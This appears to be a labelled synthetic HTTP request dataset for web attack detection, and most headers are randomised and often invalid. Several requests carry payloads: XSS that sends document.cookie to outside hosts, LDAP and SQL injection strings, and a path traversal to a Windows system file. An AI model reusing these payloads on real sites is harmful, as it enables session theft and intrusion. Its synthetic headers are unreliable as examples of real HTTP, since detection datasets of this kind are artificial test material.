ETag: "XKZQs-d0UPQvNCH"
Expect: seea=not3
From: foete@taatit2Jr.de
If-Modified-Since: Fri, 22 Sep 06 15:45:35 UTC
If-Unmodified-Since: Thu, 25 May 06 18:22:38 CET
If-Match: "xS6WSthO3_Ru1.9A"
If-None-Match: "A.u0jxFfCk72a5aUll"
If-Range: "nWP8gL4zND.eeQEHRXPD"
Max-Forwards: 1856
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: seHi alur=ihcd
Authorization: Digest uri=http://mBSrrae.biz/rhaoe.shtml
Range: -79,15944-,-5675
Referer: http://3inat.fr/trna/sentq.css
TE: chunked;q=0.2,trailers,trailers
Trailer: Warning
User-Agent: Roowoeo (zAFSZPg0@; i8xPKK_MD; iOzI9KqH-; 8kxmKgbAC)
UA-CPU: StrongARM
UA-Disp: 612,8755,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 879x932
Via: HTTP/3.7 www.heveh5.jpeg, 1.1 www.aazNe.gif, 3.7 118.217.99.195:55417
Transfer-Encoding: gzip
Upgrade: idoj/6.1, g7eoil/4.7, cotot/9.8, ewrnb/5.4, 2axs/6.7
Warning: 588 www.nwTa.shtml "bbpiwtiL" 
X-Forwarded-For: 34.245.202.84
X-Serial-Number: 2079694360100759
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32012
Start - Id: 47268
class: XSS
GET /iIcueowryohei1hrah/slUeQivMhi/rtaroolcoofm1eoEBc/Min/cGjR_ZFEm9OJ276iI/hPot/tEGNJ4Xy6XV9EMXE6wOf/39hrHgCzdXpigB1sL/yX0KPmochamz5d/fPfTtL-m1I/tZu1@6Z1Zpw0PC4u.shtml?r02=%3C%3Cscript++++%3E%5Balert+%28%27ttia%27%29%3B%5D%3C%2Fscript+++%3E&etisn=ear%3Cbi2&ic=76075&jpewsg=h+l8asorns&vjLne5i=%5CCeydroprEo&e6jnief3O=%7Ei&a60i2u=sfu8ddN&tnmYam1td=d+Eid%3C&vjiiO=ienrnir&nqpufdtfga2psnx=ETnaEtt HTTP/1.1
Host: 97.38.56.223
Connection: erh7
Accept: */*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.5
Accept-Language: vso4lw-httfloyn, eaets-vlEar, eTnr-edfg
Cache-Control: max-stale=2
Client-ip: 10.37.184.28
Cookie: uieElcspVhn=8931;iT4ayDa=emiiarafolt7yo;cteim1Aeuftp=pe8s'ysvsCe;replaceYcw7=h/ir
Cookie2: $Version="86"
Date: Thu, 29 Oct 09 11:55:59 UTC
ETag: W/"@N7GG..KkIBBJaTNB"
Expect: ntthjebs
From: mP8eatM@krgt.fr
If-Modified-Since: Mon, 23 Mar 09 13:18:17 UTC
If-Unmodified-Since: Tue, 23 Nov 04 08:04:20 GMT
If-Match: *
If-None-Match: "l3Hl775Y3-0BG2s"
If-Range: "cK.IXQxI2yMdAH-"
Max-Forwards: 75
MIME-Version: 3.6
Pragma: sit=iohoHeh
Proxy-Authorization: Basic c0lkZHRkNTpucmZH
Authorization: Basic T2V3bmthbjpMZ2kxZmE=
Range: 3-25949,-0524
Referer: http://koeMohTr.fr/ooyhaN1/itawTk/poasvids.sh
TE: gzip,chunked;q=0.8
Trailer: Warning
User-Agent: seuqqmtrgt/5.4
UA-CPU: Sparc
UA-Disp: 5931,8389,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 753x7661
Via: 4.5 241.48.49.251, dryox/2.8 www.adbt.shtml:3, hrw/9.8 81.77.9.175
Transfer-Encoding: deflate
Upgrade: 2gkxie/3.5, ehnI/4.4
Warning: 816 www.tnnynhia.jpg:19076 "wwNrihTcIteeag" "Sat, 20 Oct 07 01:41:20 GMT"
X-Forwarded-For: 228.59.131.84
X-Serial-Number: 15152704800
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47268
Start - Id: 48263
class: XSS
POST /cph7lhFsa8nsh7pewe/inetoege/easu.dll? HTTP/1.1
Content-Length: 109
Content-Language: n,mu0Esab,eanma1a6
Content-Encoding: deflate
Content-Location: http://www.Eisa.be/aaTsHo/yne9.mspx
Content-MD5: b29zcnRvZW9TZ2xnb250dQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Feb 07 06:47:56 CET
Last-Modified: Tue, 20 Jun 06 07:27:26 UTC
Host: 207.199.117.100:824
Connection: e5thorts
Accept: */*
Accept-Charset: iso-8859-8;q=0.9, euc-cn
Accept-Encoding: compress
Accept-Language: 8-d72s8rfi, pqgtasth-cNmnetrn, hsoie-oo;q=0.1
Cache-Control: no-cache
Client-ip: 166.142.44.213
Cookie: inc=<style   ><!--</style  ><script   >[window.open('http://97.99.102.66/veal.nsf'+document.cookie);]//--></script    >
Cookie2: $Version="810"
Date: Sat, 26 Dec 09 15:35:07 CET
ETag: "gtchi8tnOAeVKc2qYu"
Expect: ieboei=mixey6e
From: aeebosbw@2l6nl.biz
If-Modified-Since: Sun, 20 Nov 05 17:38:50 CET
If-Unmodified-Since: Sat, 13 Oct 07 15:47:34 CET
If-Match: "XNxpMDQ47Ch@clOYKLMZ"
If-None-Match: "VyUT2F65xuyEH32ZOvTx"
If-Range: Sun, 10 Apr 05 18:20:26 GMT
Max-Forwards: 4825
Pragma: lGt='druei'
Proxy-Authorization: Basic aGV5NXNpOnNLb28=
Authorization: 2rul hlatbiib=seDdgMHn
Range: 431947-
Referer: /CEhbRao/easea4/asegneoO/iake.mp3
TE: trailers,deflate;q=0.2
Trailer: If-Match
User-Agent: Mozilla/5.3 (X11; U; Open BSD i586 9.5; e3-in; rv:2.3.2) Gecko/08949650
UA-CPU: Sparc
UA-Color: color8
UA-Pixels: 9755x524
Via: 9.1 0.46.134.210, 7.2 www.crt3.html:761, pip/1.0 252.11.15.104:941
Transfer-Encoding: compress
Upgrade: tPo/6.0, egp/7.6
Warning: 671 129.210.117.15:935 "9nmssHeleesiilmnpeo" 
X-Serial-Number: 96907185083
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~

etwbysvua6ttmi=rA20DEZNK-q&net=1029&6scaeafo=eBj&6rDkY%uacceptskx=7933&EiframeQmq2rskZA2=nihyart&pua=61408421

End - Id: 48263
Start - Id: 7300
class: Valid
PUT /qNbVf7jJsFJIuyZb/xTKh_/UF86-script_Ui.htm? HTTP/1.1
Content-Length: 242
Content-Language: hanr
Content-Encoding: gzip
Content-Location: http://tTiXv.it/timee/Eybo/idna.nsf
Content-MD5: ZXJhZXV0c2x0dG1yV3JjbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Mar 10 19:10:57 GMT
Last-Modified: Sun, 15 Jun 08 05:04:38 GMT
Host: www.tehls.be
Connection: Dgeui21
Accept: video/*, image/*, video/*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 17.44.116.170
Cookie: ulogNpasswd83autoexecEOD=trKOn3;mN8perln=ekconnecteo;prdo9er6soeou=662530;nqidJcaG=r0d3wms;esn=mit66pbplrb;9Eatpen=g
Cookie2: $Version="1"
Date: Tue, 12 Jul 05 09:51:19 GMT
ETag: W/"qyWAPB-Ezv8Jbl@Mg"
Expect: 100-continue
From: unwtaXtu@IqrpdtE.de
If-Modified-Since: Fri, 06 Feb 09 13:28:33 CET
If-Unmodified-Since: Thu, 17 Feb 05 03:28:39 GMT
If-Match: "RuaEr2Q_JKSIQS5vDD"
If-None-Match: "ZAZIt@N5J4OqIhL"
If-Range: *
Max-Forwards: 1
MIME-Version: 7.0
Pragma: u6e=0wmaq
Proxy-Authorization: rlbrar tTa3tcon=imcivns
Authorization: Digest nc=A78DC9Ff
Range: 843670-7300,78-
Referer: /5ejeeint.jsp
TE: deflate;q=0.9
Trailer: Trailer
User-Agent: eaqtn (eU3aBnxB)
UA-CPU: 68000
UA-Disp: 4520,707,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1302x7380
Via: FTP/9.1 www.to9oIog3.js, 4.7 216.228.174.109
Transfer-Encoding: deflate
Upgrade: Pcr/6.7, asmrbh/9.1, ayi/9.1
Warning: 465 193.0.29.240 "9tdbganttoetamdoth" 
X-Forwarded-For: 30.71.65.160
X-Serial-Number: 35067124458
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dndsayuNahe=paihuAelh&trapeeptnr=r8uy&nse8=iEw&eelNeymntunitmt=00764&zx419wDm=wt&aibE1Fual=oT77F_eNmTe&5oC2orodoi=ilikeb>ieandhzmeIhn0&aetesusse=<iyTtn[tp&nrih=nn aiIhe6Thd&In6w6=wkKfROJQNx&JjoptBxbI72N=h_SD&raa6sootsltm=oMnu8&ten4=ubMM

End - Id: 7300
Start - Id: 7985
class: Valid
POST /adrcuhttewimetfhlu.mdb? HTTP/1.1
Content-Length: 244
Content-Language: mC2cahN,emd7
Content-Encoding: identity
Content-Location: /hi8wwl/izEeics8.swf
Content-MD5: blVnZWVhaURucXJvU2k2Ng==
Content-Type: application/x-www-form-urlencoded
Host: www.gsde.de
Connection: close
Accept: image/*, audio/x-wav;q=0.1, video/*
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 1.247.159.13
Date: Fri, 13 Jun 08 19:52:34 CET
If-None-Match: *
Max-Forwards: 43
Proxy-Authorization: Fs9vs 82ivtD=qasoo
Authorization: NTLM VEVhSEl1bjR2MGVnY290ZWNBdk9mdXRsb3Q0cWlpcmZyOW1zc2tlbw==
Referer: http://www.nea3refl.be/beexsds.css
User-Agent: Mozilla/7.5 (Machintosh; U; PPC 4.7; 9e-nt; rv:2.1.4) Gecko/11073571
Transfer-Encoding: gzip
Upgrade: o3ir/4.7

nQ0M1YG=group by~es&fnoNp=eservices8&nnlb7Pw=tty63sQ&hw2xmlkL=cae&hwmymtd=nlutIY57&ooitfenrn2ygs=375653&ePo1oG3Oeziaf=61&CrlhTt5oGI=nsqe5rgMateoiti&ihadsA58oIaW=ol&nAI57wCwinnt8h=6234&Rue2oa=487302843&Emiioert=inv&nafrcdSbEA=hmatnebl&XXW4=130

End - Id: 7985
Start - Id: 38944
class: LdapInjection
GET /weiIsuweh5waul/oush/pmBYQcoPfO8bmail/rg30RpaQe/i@id9AURR0qUYTA/ceewtieysu/1MCkhXydC.asmx?wtaei=rnauE&sete=5totnb03IszfO&iy7hnzes7Ea=%29++++%28+++%7C%28+++cn%3D*o+%27brien*+++%29%28mail+%3D*o%27brien*%29+++&heALqa5egos=+%3Bselectu&igiS0etnlnephta=yqsea9oFreheacp&fths8srnPltwtv=idi&dw3like7xVd=kun7a7&HtastrA=3&eubTue5wt=04599&MyQFo_VV=5&heahlebnoezj=40 HTTP/1.1
Host: 114.64.113.62
Connection: o66in
Accept: text/html;q=0.2, text/plain
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ecthio-inO, t7ebh-ofttnZ, na-isaa4, biov-os3rUdz;q=0.9
Cache-Control: max-stale=6767
Client-ip: 207.127.83.104
Cookie: te=h_Et4Q5bLt3;sfet=ohps7r/eexec;bhsne=49303
Cookie2: $Version="7"
Date: Sun, 12 Feb 06 17:48:23 GMT
ETag: "WgOE-@mxQ2kn4lL8xC_"
Expect: leah=Oactsgd
From: merdf@ssdhtag.cz
If-Modified-Since: Thu, 04 Mar 04 11:34:35 GMT
If-Unmodified-Since: Fri, 23 Dec 05 24:48:45 GMT
If-Match: *
If-None-Match: "8b4EsaMoXn.iLGv"
If-Range: Tue, 20 Jan 04 04:59:28 CET
Max-Forwards: 38
MIME-Version: 4.0
Pragma: 1ymeE3bt=bngaA
Proxy-Authorization: Basic cncwbnU6dHRpSGFhd28=
Authorization: Basic dG9lcEZxOndjYjR3UlJh
Range: 19115-,-68,486-99
Referer: /ipe9/r6aoe/cecbyhdE/noabmcs.pl
TE: chunked,chunked
Trailer: From
User-Agent: Mozilla/2.7 (Windows; U; Win98 9.6; tx-0p; rv:3.2.1) Gecko/21022232
UA-CPU: 68000
UA-Disp: 8172,5109,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0621x5666
Via: 0.8 89.150.107.5:36670
Transfer-Encoding: identity
Upgrade: shejr/6.7, moOdhj/9.9, yir/7.8
Warning: 059 110.126.4.121 "ei72xe" 
X-Forwarded-For: 97.3.123.50
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38944
Start - Id: 5041
class: Valid
PUT /ss83Irmos/tfxDGwsZVmrVG/taexl5n/uYtjYBdBN.ku0x/qI/eeebe4fCQxkdeti/@qcikEiES.IlDrls/eXAQ/aeoaBhLlen/tdhg0u6u8Eds/tdIAuz-E5CwnCoA.aspx? HTTP/1.0
Content-Length: 90
Content-Language: sst
Content-Encoding: compress
Content-Location: /ioaaaehp/1bnls/efee.swf
Content-MD5: MWVOb2J6ZGdtemV0THNrZw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 26 May 06 05:52:28 UTC
Last-Modified: Sat, 19 Jul 08 04:48:34 UTC
Host: www.ul0eEtpo.biz:131
Connection: elrl3in
Accept: */*;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 190.8.87.79
Cookie: uisecrerr5hfr=+u/;B46@xt2l-YN7=799;_GpmtMX=fnfs;rps=8148608;iimiodgnCxeEf=eOF
Cookie2: $Version="416"
Date: Sat, 19 Jul 08 01:19:44 CET
ETag: "5gXRVgLCXSgTbmz-av"
Expect: 100-continue
From: anypee@kdrqiteI.it
If-Modified-Since: Fri, 14 Nov 08 08:50:39 GMT
If-Unmodified-Since: Fri, 26 Mar 10 08:55:02 GMT
If-Match: "LXziOXMx.x_VSSr"
If-None-Match: "VB9wvERSa7EoA4JZFre"
If-Range: Tue, 21 Mar 06 09:54:42 GMT
Max-Forwards: 238
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Basic S2liYWFsOmVhc0puZU8=
Authorization: Digest opaque="ilietlh"
Range: -809077,653-170430,-158191
Referer: /llcesx/1hhffux/dnchetri.fgf
TE: trailers
Trailer: Transfer-Encoding
User-Agent: eETdos9T4n
UA-CPU: StrongARM
UA-Disp: 522,847,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 561x459
Via: 5.0 135.58.225.217:573, HTTP/1.9 27.47.174.221:8059
Transfer-Encoding: identity
Upgrade: 2Laa/6.7, ilt/8.0
Warning: 707 0.240.235.64 "eeosAfhomel" 
X-Forwarded-For: 90.219.143.51
X-Serial-Number: 4278747254
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

ej8a0dr=iEs&sjs2j6ohbaSoes=hF3nt&tts=36909&rdtotoL76n=ersogisn&ebu=448&iaen2atlmsmo=2thest

End - Id: 5041
Start - Id: 37817
class: LdapInjection
GET /0passthruJtkyP9eJsXW/48-B5hzC2Jjt/rcm@v/25/XSlike7bformAndivcEiframe_./gn.ZK/hzzInFTHP/tSYwdNwX_3GvdA3h.xK/DXXCM.asp?d6atc=RaaXict&Mirndk2riaRw=iJ.IW&e7=%29+%28++%7C+++%28displayName%3Dhad*%29+%28name++++%3Dhad*++%29%28++++mail%3Dhad*+++%29&pmNno=rs&shogsbpuRoc=hbliuMhr%28&rfdac=tzh1&hyIs=qemashutdowneeEedvz HTTP/1.1
Host: www.hhahrmksed.com:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-7;q=0.1, x-mac-japanese;q=0.3, x-mac-turkish, iso-8859-1
Accept-Encoding: deflate
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 76.169.84.54
Cookie: uogtr5dh1c=0Bwghmo4I;an3=r;pfrn=523;ae29T13B5nslu=rIoe
Cookie2: $Version="625"
Date: Sun, 11 Jan 09 24:33:03 GMT
ETag: W/"73onUuR9.zMCXKlol1M"
Expect: soee=rrillw0;tfrta=vHins
From: inAltlp8@n6nlbheD8q.it
If-Modified-Since: Thu, 20 Nov 08 20:04:09 CET
If-Unmodified-Since: Wed, 04 May 05 07:52:18 CET
If-Match: "XdyF.DsXoPOBrd-Cv"
If-None-Match: "EgzV1.rlzqBsIDQoJs6"
If-Range: *
Max-Forwards: 7696
MIME-Version: 0.8
Pragma: onrotak='rrthecM'
Proxy-Authorization: Basic bmVvdDZzOndpdGNvcQ==
Authorization: Basic N2FkYmlyczp5bHFyb2VJ
Range: 094778-515740,335144-
Referer: http://nnrt.st/trtni/Eh3di.css
TE: deflate;q=0.2,chunked
Trailer: If-Range
User-Agent: n@2Hjj9u http://www.r7EaS.org
UA-CPU: x86
UA-Disp: 0815,794,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: 1.1 www.lineeNg.htm, 2.6 www.ieeznco.js:7
Transfer-Encoding: gzip
Upgrade: ziaeo/3.7, fyav/7.8, dpa0ed/1.0, mfirt/0.2, pSli/6.6
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 66.215.97.109
X-Serial-Number: 9737658238850824210
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37817
Start - Id: 48051
class: XSS
GET /Flwrrtwzw7Qhlid/8piittti/YsfB3.6m/B9smomttaiEgtidte/ihh3iv28oot.jpg?kSe=euz+&teSU35lgnmaita=oehp&lq=%28riae0anldu&bvNmocha8dVL9catA=%3C%21%5BCDATA%5B%3C%21--%5D%5D++%3E%3Cscript+%3E%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.raolndas.com%2Fcgi-bin%2Ftegenanain.cgi%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript%3E HTTP/1.0
Host: 123.25.28.148
Connection: close
Accept: text/html;q=0.5, image/*, text/xml;q=0.2
Accept-Charset: windows-1252;q=0.4, big5, gb2312
Accept-Encoding: deflate;q=0.5, compress, compress
Accept-Language: n-gaI;q=0.8
Cache-Control: max-age=8842
Client-ip: 252.198.126.142
Cookie: sleiecTm3d=2015722541;raiia=teiteoa;tgtutls=mpBNpohavctsos
Cookie2: $Version="1"
Date: Tue, 28 Dec 04 09:58:22 UTC
ETag: "L_-wg1nSAVO_G5W.OjZ4"
Expect: anmte=7mtotl;taCmh=mwueaUo
From: agsv@hn76ev.st
If-Modified-Since: Fri, 19 Jun 09 11:15:13 UTC
If-Unmodified-Since: Sun, 05 Jun 05 21:32:00 GMT
If-Match: "5-WC9.pKi3PmZ_j"
If-None-Match: *
If-Range: *
Max-Forwards: 87
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: eofH ewreea=Anton
Authorization: nrsO grats=oecceisw
Range: 16-601
Referer: http://tececsD.biz/ohleea1/enfe.cgi
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/6.1 (Machintosh; U; PPC Mac OS X 1.1; hE-eO; rv:0.2.2) Gecko/27482053
UA-CPU: StrongARM
UA-Disp: 0372,351,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 6389x0168
Via: 1.0 www.wreqh.htm, FTP/7.4 www.dj80.js
Transfer-Encoding: identity
Upgrade: ohr/0.8, dird/9.6, ccspda/7.4, eaonS/0.7, xbT1yr/6.0
Warning: 931 43.142.35.211 "tUI3qeeCt" "Mon, 16 Feb 04 11:58:32 CET"
X-Forwarded-For: 142.37.94.150
X-Serial-Number: 405569074263988888
----: -----------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 48051
Start - Id: 42070
class: SqlInjection
GET /tQD/hH9T6j7Bsock_streamAv3Jka/pr/wieslrEdn4ee/oqnhteho/PELRrchildpassthruutSMPobjectZ/ta2-eBhuY4lRHMJ.jpeg?9rotHttmx=%27select++customer_phone++%27%7C%7C%27from+++++customers+%27%7C%7C%27where+++customer_surname%3D%27%27%27%7C%7C++++lv_surname%7C%7C%27%27%27+and+++++customer_type%3D1%27%3B&oytNdrl0li1=hoof3s HTTP/1.0
Host: 224.140.254.205
Connection: sixneFdn
Accept: */*;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: lel-s8r8ndht;q=0.7, sadFeure-cj;q=0.1, efrlasit-jnvtntnf;q=0.9, EoazrJhh-vnnfln;q=0.4, ehVidfer-d;q=0.3
Cache-Control: min-fresh=30928
Client-ip: 18.205.184.49
Cookie: Enupln4Ie8=3hL;hihorFrinuhno=ieA;tel=9417;ennCSgel=tLsuWc
Cookie2: $Version="58"
Date: Sat, 12 Apr 08 11:05:12 CET
ETag: "1pNrCI08loZx0@fmb"
Expect: dntttuy
From: mwetzo8a@ourctd.net
If-Modified-Since: Thu, 04 Feb 10 16:09:08 CET
If-Unmodified-Since: Tue, 02 Oct 07 22:49:22 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 07 Jun 06 07:56:44 GMT
Max-Forwards: 6
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: miIioo U7Eesss=eomtuaa
Authorization: Basic YTFmZm46bmhuaWti
Range: 97-55
Referer: http://eaHE8.uk/par6/tuzEtes/royp/ot7s/yaerSI.jpeg
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: onm0va/5.7.7.6
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4241x2926
Via: 1.0 161.174.53.24, HTTP/2.2 www.orfEun.js
Transfer-Encoding: deflate
Upgrade: rRlEh/1.9
Warning: 537 38.107.5.37 "lwo1hwxdnein" 
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 702887096
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42070
Start - Id: 9295
class: Valid
GET /lF_shg61JE--MDnv/auseotg2e6la/sRcN1perlJqVn/umj_mAHWB2Oez/sUTsR/lU/dRw6TLB017NzVck/3SGJK@.winnt/ratse/f5t.htm?netcatkFNjbf=5&vFhperlshutdownvYV1=dnmblFknlil56iit&8s=aste9f9 HTTP/1.1
Host: www.ewreeapee.it:80
Connection: fno2fir3
Accept: */*
Accept-Charset: x-mac-cyrillic;q=0.6, cp-950;q=0.2
Accept-Encoding: gzip;q=0.7, gzip;q=0.1, gzip;q=0.8, gzip;q=0.4
Accept-Language: *;q=0.1
Cache-Control: max-age=18773
Client-ip: 201.8.180.111
Cookie: yeyehm=sndL;ump=sro:;eok;ilepl=utmV6sn2
Cookie2: $Version="20"
Date: Wed, 10 Jan 07 21:23:43 CET
ETag: W/"RcS8qx1A-YjfM-RpU"
Expect: ejrw=feEent06;sLesp=hRhwpg
From: clbdsbE@ouRcuroAt.it
If-Modified-Since: Tue, 24 Feb 04 01:29:09 UTC
If-Unmodified-Since: Sun, 05 Aug 07 16:06:44 CET
If-Match: "OXfLq5ldsQ5h9E_"
If-None-Match: "CNVlA7QBoOefG.E"
If-Range: Mon, 15 Aug 05 24:23:50 GMT
Max-Forwards: 262
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: uwsis atswerih=iylimA
Range: -7,24425-
Referer: http://www.9ate.de/umrtr9/volX0Tie/noms.css
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/8.7 (compatible; wo1icxnpc; Open BSD i386; rrhZEsOE; rsteDgyiao; uh9mpp)
UA-CPU: 68000
UA-Disp: 5472,2559,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6875x133
Via: FTP/7.7 224.28.165.35, HTTP/2.0 207.132.195.126
Transfer-Encoding: wgeati
Upgrade: ne3a/3.0, ktz/8.6, tsjraE/5.2, hlfe/6.2
Warning: 773 228.146.161.18 "eogoeOendth" "Tue, 23 Jan 07 17:19:26 CET"
X-Forwarded-For: 215.205.82.248
X-Serial-Number: 378312956268
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9295
Start - Id: 12811
class: Valid
GET /nVWAReEkvPLg/nSyteqsTODntm/iirwman.mspx?Es=alsechose%7CgCyo&4yj52jobjectW8O=HSm5%5Cre4i&tnq=6&uc=oek6DAuPqc&ttAobme=her%3A&8o7a9m5nEtcn=o&qA1rsoE=oifatWuPo&ehcb=bl%3Fr%2Bo6&sh=a5Ny5ot%7Cwuhns&fasnozeerteln=jer&w4Dnswalu=ssm&DgXbgsoundCMeHwOM=+gttellt+aornodea&e0tetTtuzs3o=umm%26&Klsystemzmid=phhtpassht HTTP/1.1
Host: 159.192.43.25
Connection: ywHnx7
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 186.162.244.242
Cookie: iemteBtf=dpzye;cin1oz4rlttaj=595942
Cookie2: $Version="0"
Date: Tue, 12 Jul 05 12:05:58 GMT
ETag: W/"OC3Mp1v8cvCtQtamre"
Expect: 100-continue
From: tibfhrt@6ra7.com
If-Modified-Since: Wed, 28 Jul 04 10:36:53 UTC
If-Unmodified-Since: Wed, 02 Dec 09 13:11:55 CET
If-Match: *
If-None-Match: "QkgLkd2j8zorKrq9"
If-Range: Fri, 22 Feb 08 03:32:21 CET
Max-Forwards: 51
MIME-Version: 8.3
Pragma: pMcshzue='0Stb'
Proxy-Authorization: Digest nonce
Authorization: NTLM ckh4aWNhdW9heWkyZWNvbHk5aXVkcmFsUm5sNHRpc2lUdWxl
Range: 880687-,10-
Referer: http://www.attoOl3.cz/hkscaxr/nfca/yueEHN5/pcsd/CyBoaNdm.msf
TE: trailers,deflate
Trailer: Accept-Charset
User-Agent: aoaaiter (iL2eugRA4y; aMnanGRZng; 4KzmvZR; kD04Wf1ct)
UA-CPU: x86
UA-Disp: 3127,7217,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8634x945
Via: 3.6 www.weja.htm, HTTP/4.7 www.gbsimIt.css
Transfer-Encoding: compress
Upgrade: DoR/2.1, rahogo/2.6
Warning: 494 130.146.46.121 "atTyo" "Sun, 05 Oct 08 10:26:05 GMT"
X-Forwarded-For: 129.36.3.102
X-Serial-Number: 392683968
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12811
Start - Id: 21886
class: Valid
GET /rpmULxAS.-CzcDS5pLk/5nqX1FEUlJw1An73D5/e5n.js?nszsc4=S&tsrt=+Mlo&vtqsows2nsfa=ln&BRhmailX=50097&ientlti=4&tteegeottt=r+Ic&tipTsaNu=ruTm14k.EC&w7nni4B08nz=e3aeobA&sEnrni=4e%3Bmetalocations3ci+yiHl9&pjwlsfaB0_U=xictosstin+y HTTP/1.0
Host: 114.49.100.153:66
Connection: close
Accept: video/mpeg;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: dR=znx3k
Client-ip: 77.124.253.80
Cookie: 50rLZAmeta90F=8520434;YGff8insertmetahtaccesxzj=4682
Cookie2: $Version="585"
Date: Sun, 03 Jul 05 15:57:01 UTC
ETag: W/"yjNA9XkPUWq5sNl"
Expect: ohTw2=3Sm4tlko;zoeayq
From: gspde@ia3eGzume.be
If-Modified-Since: Fri, 22 Apr 05 19:27:09 GMT
If-Unmodified-Since: Wed, 06 Feb 08 03:49:39 GMT
If-Match: *
If-None-Match: "U987zJHhUZk5MaPq"
If-Range: "ge6XUtF4MBe.-9Z"
Max-Forwards: 98
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: iele gsycpn=cveretgu
Authorization: Basic YmdudHNhbFM6YUxlZ2RnekU=
Range: -34244,001-
Referer: http://ssnRrooo.be/h43u/yd8amnHa/yaot.bin
TE: chunked;q=0.8,trailers
Trailer: Trailer
User-Agent: rsaw1dsefeio
UA-CPU: StrongARM
UA-Disp: 9551,981,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 196x452
Via: ien/0.4 93.243.135.86
Transfer-Encoding: gzip
Upgrade: cuSa/4.1, ehd/3.9, ecn/7.5
Warning: 810 48.19.38.105 "wocweaael2R4t" "Mon, 17 Nov 08 22:16:35 GMT"
X-Forwarded-For: 182.115.130.238
X-Serial-Number: 3182273
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21886
Start - Id: 45784
class: PathTransversal
GET /e7admin@NxK.aspx?ued9geIiarf=e5KeLty&xl1t=115&gSUchild0=b2rofo4&tdrtCdnan7r4d2a=446904018&JNCg=xtt&FUi8optyincludeobjectLtjR=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&Syo3RZFdFokE=nH&-L9YJy=%5B&rmI8ee=rnhtI&goaotordtuL=by2fweyddts&RaLnpamw=0IiXS-Yc7 HTTP/1.0
Host: 31.167.9.162
Connection: close
Accept: text/*;q=0.2, video/mpeg;q=0.0, text/plain;q=0.4
Accept-Charset: iso-10646-ucs-2, x-mac-ce;q=0.4, macintosh
Accept-Encoding: deflate;q=0.0, identity;q=0.6, gzip, deflate;q=0.5, gzip;q=0.9
Accept-Language: *
Cache-Control: max-stale
Client-ip: 79.240.194.64
Cookie: zUe= rindausrteht<oo;dmlatp4=7
Cookie2: $Version="43"
Date: Wed, 11 Oct 06 24:43:05 GMT
ETag: "1UYXYoyn1ISOZ-ytTEbk"
Expect: fli7=ifppb
From: rsj6lTrn@Ezll0rry.ch
If-Modified-Since: Wed, 19 May 04 24:16:36 CET
If-Unmodified-Since: Sun, 03 Jul 05 20:05:06 UTC
If-Match: *
If-None-Match: *
If-Range: "Irwt@In046fuLsQ0."
Max-Forwards: 442
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: poeeh dwdky=eorL
